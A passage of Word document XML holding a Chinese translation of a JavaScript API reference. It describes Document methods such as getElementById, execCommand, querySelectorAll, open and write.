    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>创建并返回一个代表指定文本的新的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Element </w:t>
      </w:r>
      <w:r>
        <w:t>elementFromPoint(float x,float y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回在窗口坐标</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>处嵌套最深的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean execCommand(string commandId,[boolean showUI,[string value]])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在插入光标所在的可编辑元素上执行参数</w:t>
      </w:r>
      <w:r>
        <w:t>commandId</w:t>
      </w:r>
      <w:r>
        <w:t>指定名字的编辑命令。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了下面这些命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251753472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2596550" cy="871267"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="98" name="00098.jpeg" descr="000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8.jpeg" descr="00098.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId101"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2596550" cy="871267"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有一些方法（比如</w:t>
      </w:r>
      <w:r>
        <w:t>"createLink"</w:t>
      </w:r>
      <w:r>
        <w:t>）需要一个参数值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>execCommand()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数值为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则第三个参数将用做命令</w:t>
      </w:r>
      <w:r>
        <w:t>的参数；否则，浏览器会弹出提示框让用户输入需要的值。更多关于</w:t>
      </w:r>
      <w:r>
        <w:t>execCommand()</w:t>
      </w:r>
      <w:r>
        <w:t>的内容请参考</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element getElementById(string elementId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法在当前文档中搜索</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>elementId</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点，并返回这个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>，如果没有找到对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>，它将返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。在一个文档中，</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值应该是唯一的，不过如果这个方</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>法找到了多个</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>elementId</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，它将返回第一个。这个方法很重要并且很常用，因为它提供了一个简单的方法来获取代表一个指定文档元素的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。注意这个方法的名字以</w:t>
      </w:r>
      <w:r>
        <w:t>"Id"</w:t>
      </w:r>
      <w:r>
        <w:t>结尾，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>"ID"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList getElementsByClassName(string classNa</w:t>
      </w:r>
      <w:r>
        <w:t>mes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个类数组对象，其中的元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性值包含所有</w:t>
      </w:r>
      <w:r>
        <w:t>classNames</w:t>
      </w:r>
      <w:r>
        <w:t>定义的类。</w:t>
      </w:r>
      <w:r>
        <w:t>classNames</w:t>
      </w:r>
      <w:r>
        <w:t>可以是一个单独的类，也可以是由空格分隔的多个类的列表。返回的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象是实时的，文档改变后会自动更新。返回的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>中的元素的顺序与文档中它们出现的顺序相同。注意这个方法在</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>中也定义了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList getElementsByName(string elementName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回一个实时的、只读的类数组对象，包含所有</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>elementNa</w:t>
      </w:r>
      <w:r>
        <w:t>me</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。如果没有匹配元素，这个方法返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList getElementsByTagName(string qualifedName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回一个只读的类数组对象，包含文档中有指定标签名的所有</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点，顺序与它们在文档源代码中出现的顺序相同。这个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>实时的</w:t>
      </w:r>
      <w:r>
        <w:t>”——</w:t>
      </w:r>
      <w:r>
        <w:t>文档改变时，如果有必要，它</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的内容会自动更新。对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>来说，标签名是不区分大小写的。一个特例是，标签名</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>匹配文档中的所有元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>接口定义了一个同名</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，该方法仅搜索文档的子树。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList getElementsByTagNameNS(string namespace,string localName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法类似于</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>，但它将取得的标签名定义为命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>和命名空间中的本地名称的组合。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean hasFocus()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前文档的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>拥有键盘焦点（如果这个窗口不是顶层窗口，则它的所有祖先都拥有焦点），这个方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node importNode(Node node,boo</w:t>
      </w:r>
      <w:r>
        <w:t>lean deep)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法传入一个由其他文档定义的节点，并返回这个节点的一份适合插入当前文档的副本。如果</w:t>
      </w:r>
      <w:r>
        <w:t>deep</w:t>
      </w:r>
      <w:r>
        <w:t>值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，这个节点的所有子节点都将复制。原始节点和它的依赖节点不会有任何修改。返回的副本的</w:t>
      </w:r>
      <w:r>
        <w:t>ownerDocument</w:t>
      </w:r>
      <w:r>
        <w:t>属性被设置为当前文档，但</w:t>
      </w:r>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，因为它还没有插入到当前文档中。注册到原始节点或节点树上的事件监听函数不会复制。也可参考</w:t>
      </w:r>
      <w:r>
        <w:t>adoptNode()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window open(string url,string name,string features,[</w:t>
      </w:r>
      <w:r>
        <w:t>boolean replace])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当文档的</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以三个或更多参数调用时，它的表现和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样。可参考</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Document open([string type],[string replace])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>只有两个或更少的参数时，这个方法将擦除当前文档并开始一个新的（使用现存的那个</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这也是这个方法的返回值）。调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>之后，就可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>writeln()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将内容以流的形式写到文档中，然后使用</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>来结束文档并强制显示</w:t>
      </w:r>
      <w:r>
        <w:t>它的新内容。细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>省略或值为</w:t>
      </w:r>
      <w:r>
        <w:t>"text/html"</w:t>
      </w:r>
      <w:r>
        <w:t>，新的文档将是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档，在其他情况下，它将是一个纯文本文档。如果参数</w:t>
      </w:r>
      <w:r>
        <w:t>replace</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，新文档将在浏览历史中取代旧文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法不应该由正要重写的文档中的脚本或事件处理程序调用，因为这个脚本或处理程序自身将被重写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>boolean queryCommandEnabled(string commandId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果现在传入</w:t>
      </w:r>
      <w:r>
        <w:t>commandId</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>execCommand()</w:t>
      </w:r>
      <w:r>
        <w:t>中是有意义的，这个方法将返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返</w:t>
      </w:r>
      <w:r>
        <w:t>回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。比如，如果没有操作可以撤销，那么</w:t>
      </w:r>
      <w:r>
        <w:t>"undo"</w:t>
      </w:r>
      <w:r>
        <w:t>命令将不可用。参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean queryCommandIndeterm(string commandId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果由于</w:t>
      </w:r>
      <w:r>
        <w:t>queryCommandState()</w:t>
      </w:r>
      <w:r>
        <w:t>不能返回一个有意义的值，因此</w:t>
      </w:r>
      <w:r>
        <w:t>commandId</w:t>
      </w:r>
      <w:r>
        <w:t>处于一个不确定的状态，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>定义的命令永远不会处于不确定状态，但特定于浏览器的命令可能会。参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean queryCommandState(string commandId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回指定</w:t>
      </w:r>
      <w:r>
        <w:t>commandId</w:t>
      </w:r>
      <w:r>
        <w:t>的状态。如果光标或选区正处于斜体中，则一些编辑命令（比如</w:t>
      </w:r>
      <w:r>
        <w:t>"bold"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"italic"</w:t>
      </w:r>
      <w:r>
        <w:t>）有状态</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。不过，大多数命令没有状态，这些方法总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean queryCommandSupported(string commandId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果浏览器支持指定的命令则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>string queryCommandValue(string commandId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将指定命令的状态作为字符串返回。参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element querySelector(string selectors)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回当前文档中匹配指定的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS selector</w:t>
      </w:r>
      <w:r>
        <w:t>（可能是一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器或者一组由逗号隔开的选择器）的第一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList querySelectorAll(string selectors)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回包含当前文档中匹配指定</w:t>
      </w:r>
      <w:r>
        <w:t>CSS selector</w:t>
      </w:r>
      <w:r>
        <w:t>（可能是一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器或者一组由逗号隔开的选择器）的所有元素的类数组对象。和</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTag</w:t>
      </w:r>
      <w:r>
        <w:t>Name()</w:t>
      </w:r>
      <w:r>
        <w:t>及相似方法返回的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>不同，这个方法返回的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>不是实时的：它只是调用这个方法时匹配元素的一张静态快照。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void write(string text...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将它的参数追加到文档中。可以在文档正在加载时调用它，以便在对应＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的位置插入内容，或者也可以在调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法后使用它。细节参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void writeln(string text...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法和</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLDocument.write()</w:t>
      </w:r>
      <w:r>
        <w:t>很像，不同之处在于它会在追加的文本后面添加一个换行符。比如，在写＜</w:t>
      </w:r>
      <w:r>
        <w:t>pre</w:t>
      </w:r>
      <w:r>
